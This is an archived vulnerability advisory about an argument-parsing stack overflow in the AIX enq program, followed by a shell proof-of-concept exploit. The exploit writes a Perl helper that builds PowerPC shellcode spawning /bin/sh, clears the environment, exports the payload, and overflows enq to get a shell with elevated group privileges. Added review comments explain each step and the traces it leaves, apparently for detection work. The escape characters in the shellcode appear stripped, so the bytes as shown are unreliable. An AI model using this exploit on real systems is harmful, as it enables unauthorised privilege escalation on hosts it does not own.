source: http://www.securityfocus.com/bid/2034/info
AIX is a variant of the UNIX Operating System, distributed by IBM. A problem exists that may allow elevation of user privileges.
The problem occurs in the enq program. It is reported that an overflow exists in the command line argument parsing, which could lead to the overwriting of variables on the stack. This creates the potential for a malicious user to execute arbitrary code, and possibly gain administrative access.
#!/bin/sh
# FileName: ex_enq_aix4x.sh
# Proof-of-concept for the "enq & qstatus" argument-parsing overflow on
# AIX 4.x; the stated goal is a shell running with egid=9.
# Usage : chmod ex_enq_aix4x.sh ; ./ex_enq_aix4x.sh
# Tested : on AIX 4.3.3
# Author : [email protected]
# Site : www.xfocus.org www.xfocus.net
# Date : 2003-4-24
# Notice: use at your own risk!
#
# NOTE(review): this listing is kept byte-for-byte as archived. The comments
# below describe what each step does and which artifacts it leaves, so the
# activity can be recognised in process accounting, audit logs or a /tmp
# listing.

# Fixed paths: the Perl interpreter and two dot-prefixed scratch files under
# /tmp. The scratch names are predictable and live in a world-writable
# directory; both files are removed later in the script, so they exist only
# briefly.
PERL=/usr/bin/perl
TMP=/tmp/.env.tmp
SHPL=/tmp/.sh.pl
# Write a helper Perl script to $SHPL. The here-document body is data written
# to that file, not shell commentary. As listed, the helper builds a long
# padded string, picks a one-byte suffix ($ID) according to the output of
# /usr/bin/oslevel, appends "/bin/sh" plus that suffix, and prints the result.
cat >$SHPL<<EOF
#!/usr/bin/perl
$BUFF="";
$BUFF.="x7cxa5x2ax79"x500;
$OSLEVEL=`/usr/bin/oslevel`;
$ID="x04";
if( $OSLEVEL=~/4.1/ ) {
$ID="x03";
} elsif($OSLEVEL=~/4.3.3/) {
$ID="x03";
} elsif( $OSLEVEL=~/4.2/ ) {
$ID="x02";
}
$BUFF.="x7cxa5x2ax79x40x82xffxfdx7fxe8x02xa6";
$BUFF.="x3bxffx01x20x38x7fxffx08x38x9fxffx10";
$BUFF.="x90x7fxffx10x90xbfxffx14x88x5fxffx0f";
$BUFF.="x98xbfxffx0fx4cxc6x33x42x44xffxffx02";
$BUFF.="/bin/sh";
$BUFF.=$ID;
print $BUFF;
EOF
# Emit one "unset NAME" line per environment variable, drop every line that
# contains LOGNAME, and save the result to $TMP.
env | awk -F = '{print "unset "$1;}'|grep -v LOGNAME > $TMP
# Source the generated file in the current shell so that those variables are
# unset here, then delete the scratch file.
. $TMP
/bin/rm -f $TMP
# Run the helper and export its output, prefixed with "A", as the environment
# variable CC so that child processes inherit it. An unusually large CC value
# in a process environment is a visible indicator of this step.
CC=A`$PERL $SHPL` ; export CC
# Remove the helper script once its output has been captured.
/bin/rm -f $SHPL
# Invoke enq with a -w argument generated by repeating a short string 600
# times. The advisory text above the script attributes the flaw to enq's
# command-line argument parsing; an enq execution with an abnormally long -w
# value from an unprivileged account is the event to alert on.
/usr/bin/enq -w"`perl -e 'print "x2fxf2x2bx10"x600'`"
#EOF